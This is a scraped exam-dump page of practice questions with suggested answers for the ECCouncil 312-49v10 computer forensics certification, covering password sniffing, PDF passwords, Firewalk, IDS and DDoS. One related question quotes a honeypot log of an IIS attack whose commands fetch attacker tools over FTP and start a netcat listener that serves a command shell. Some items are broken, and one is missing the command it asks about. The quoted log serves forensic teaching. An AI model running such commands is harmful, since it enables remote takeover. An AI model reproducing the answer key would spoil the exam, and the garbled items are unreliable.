ExamGecko
Search Search Login
Home Home / ECCouncil / 312-49v10

ECCouncil 312-49v10 Practice Test - Questions Answers, Page 16

Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?
William is examining a log entry that reads 192.168.0.1 - - [18/Jan/2020:12:42:29 +0000) "GET / HTTP/1.1" 200 1861. Which of the following logs does the log entry belong to?
In Windows, prefetching is done to improve system performance. There are two types of prefetching: boot prefetching and application prefetching. During boot prefetching, what does the Cache Manager do?
During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore, you report this evidence. This type of evidence is known as:
What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?
In which of these attacks will a steganalyst use a random message to generate a stego-object by using some steganography tool, to find the steganography algorithm used to hide the information?
An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?
You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?
Malware analysis can be conducted in various manners. An investigator gathers a suspicious executable file and uploads It to VirusTotal in order to confirm whether the file Is malicious, provide information about Its functionality, and provide Information that will allow to produce simple network signatures. What type of malware analysis was performed here?

Question 151

Report
Export
Collapse

John and Hillary works at the same department in the company. John wants to find out Hillary's network password so he can take a look at her documents on the file server. He enables Lophtcrack program to sniffing mode. John sends

Hillary an email with a link to Error! Reference source not found. What information will he be able to gather from this?

A.
Hillary network username and password hash
A.
Hillary network username and password hash
Answers
B.
The SID of Hillary network account
B.
The SID of Hillary network account
Answers
C.
The SAM file from Hillary computer
C.
The SAM file from Hillary computer
Answers
D.
The network shares that Hillary has permissions
D.
The network shares that Hillary has permissions
Answers
Suggested answer: A

Question 152

Report
Export
Collapse

Bill is the accounting manager for Grummon and Sons LLC in Chicago. On a regular basis, he needs to send PDF documents containing sensitive information through E-mail to his customers.

Bill protects the PDF documents with a password and sends them to their intended recipients.

Why PDF passwords do not offer maximum protection?

A.
PDF passwords can easily be cracked by software brute force tools
A.
PDF passwords can easily be cracked by software brute force tools
Answers
B.
PDF passwords are converted to clear text when sent through E-mail
B.
PDF passwords are converted to clear text when sent through E-mail
Answers
C.
PDF passwords are not considered safe by Sarbanes-Oxley
C.
PDF passwords are not considered safe by Sarbanes-Oxley
Answers
D.
When sent through E-mail, PDF passwords are stripped from the document completely
D.
When sent through E-mail, PDF passwords are stripped from the document completely
Answers
Suggested answer: A

Question 153

Report
Export
Collapse

Meyer Electronics Systems just recently had a number of laptops stolen out of their office. On these laptops contained sensitive corporate information regarding patents and company strategies. A month after the laptops were stolen, a competing company was found to have just developed products that almost exactly duplicated products that Meyer produces. What could have prevented this information from being stolen from the laptops?

A.
EFS Encryption
A.
EFS Encryption
Answers
B.
DFS Encryption
B.
DFS Encryption
Answers
C.
IPS Encryption
C.
IPS Encryption
Answers
D.
SDW Encryption
D.
SDW Encryption
Answers
Suggested answer: A

Question 154

Report
Export
Collapse

Kimberly is studying to be an IT security analyst at a vocational school in her town. The school offers many different programming as well as networking languages. What networking protocol language should she learn that routers utilize?

A.
ATM
A.
ATM
Answers
B.
UDP
B.
UDP
Answers
C.
BPG
C.
BPG
Answers
D.
OSPF
D.
OSPF
Answers
Suggested answer: D

Question 155

Report
Export
Collapse

What is the target host IP in the following command?

A.
172.16.28.95
A.
172.16.28.95
Answers
B.
10.10.150.1
B.
10.10.150.1
Answers
C.
Firewalk does not scan target hosts
C.
Firewalk does not scan target hosts
Answers
D.
This command is using FIN packets, which cannot scan target hosts
D.
This command is using FIN packets, which cannot scan target hosts
Answers
Suggested answer: A

Question 156

Report
Export
Collapse

George is a senior security analyst working for a state agency in Florid a. His state's congress just passed a bill mandating every state agency to undergo a security audit annually. After learning what will be required, George needs to implement an IDS as soon as possible before the first audit occurs. The state bill requires that an IDS with a "time-based induction machine" be used.

What IDS feature must George implement to meet this requirement?

A.
Signature-based anomaly detection
A.
Signature-based anomaly detection
Answers
B.
Pattern matching
B.
Pattern matching
Answers
C.
Real-time anomaly detection
C.
Real-time anomaly detection
Answers
D.
Statistical-based anomaly detection
D.
Statistical-based anomaly detection
Answers
Suggested answer: C

Question 157

Report
Export
Collapse

John is using Firewalk to test the security of his Cisco PIX firewall. He is also utilizing a sniffer located on a subnet that resides deep inside his network. After analyzing the sniffer log files, he does not see any of the traffic produced by

Firewalk. Why is that?

A.
Firewalk cannot pass through Cisco firewalls
A.
Firewalk cannot pass through Cisco firewalls
Answers
B.
Firewalk sets all packets with a TTL of zero
B.
Firewalk sets all packets with a TTL of zero
Answers
C.
Firewalk cannot be detected by network sniffers
C.
Firewalk cannot be detected by network sniffers
Answers
D.
Firewalk sets all packets with a TTL of one
D.
Firewalk sets all packets with a TTL of one
Answers
Suggested answer: D

Question 158

Report
Export
Collapse

After undergoing an external IT audit, George realizes his network is vulnerable to DDoS attacks.

What countermeasures could he take to prevent DDoS attacks?

A.
Enable direct broadcasts
A.
Enable direct broadcasts
Answers
B.
Disable direct broadcasts
B.
Disable direct broadcasts
Answers
C.
Disable BGP
C.
Disable BGP
Answers
D.
Enable BGP
D.
Enable BGP
Answers
Suggested answer: B

Question 159

Report
Export
Collapse

George is performing security analysis for Hammond and Sons LLC. He is testing security vulnerabilities of their wireless network. He plans on remaining as "stealthy" as possible during the scan. Why would a scanner like Nessus is not recommended in this situation?

A.
Nessus is too loud
A.
Nessus is too loud
Answers
B.
Nessus cannot perform wireless testing
B.
Nessus cannot perform wireless testing
Answers
C.
Nessus is not a network scanner
C.
Nessus is not a network scanner
Answers
D.
There are no ways of performing a "stealthy" wireless scan
D.
There are no ways of performing a "stealthy" wireless scan
Answers
Suggested answer: A

Question 160

Report
Export
Collapse

At what layer of the OSI model do routers function on?

A.
4
A.
4
Answers
B.
3
B.
3
Answers
C.
1
C.
1
Answers
D.
5
D.
5
Answers
Suggested answer: B
Total 704 questions
Go to page: of 71
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms